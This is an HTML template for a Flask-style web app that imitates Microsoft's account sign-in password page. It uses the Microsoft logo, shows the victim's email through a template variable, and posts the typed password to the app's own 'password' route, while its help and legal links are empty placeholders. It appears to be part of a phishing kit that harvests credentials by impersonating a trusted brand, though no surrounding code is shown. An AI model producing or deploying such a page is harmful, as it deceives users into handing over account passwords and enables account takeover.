<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in to your Microsoft account</title>
    <link rel="stylesheet" href="../static/css/styles.css">
    <style>
        form {
          width:100%;
          overflow:hidden;
        }
        form {
          animation: slide-left 0.5s;
        }
        
        @keyframes slide-left {
          from {
            margin-left: 100%;
            width: 300%; 
          }
        
          to {
            margin-left: 0%;
            width: 100%;
          }
        }
        </style>

</head>
<body>
<div class="wrapper">
    <div id="div1">
        <img id="img1" src="/static/image/microsoftlogo.png" alt="pic">
        <!-- <a href="{{ url_for ('mail') }}" style="text-decoration:none;"><p> &larr; </p></a>  -->
        <p> {{ email }}  </p>      
        <p id="p1">Enter password</p>
        <form action="{{ url_for('password') }}" method="post">
        <input id="textbox" type="password" name="password" placeholder="Password" required>
        <hr>
        <a id="a2" href="#">Forgot password?</a>
        <input id="submit_password" type="submit" name="submit" value="Sign in">
    </form>
    </div>

 

    <div id="div3">
        <a id="a4" href="#">Terms of use</a>
        <a id="a5" href="#">Privacy & cookies</a>

    </div>   
</div>

</body>
</html>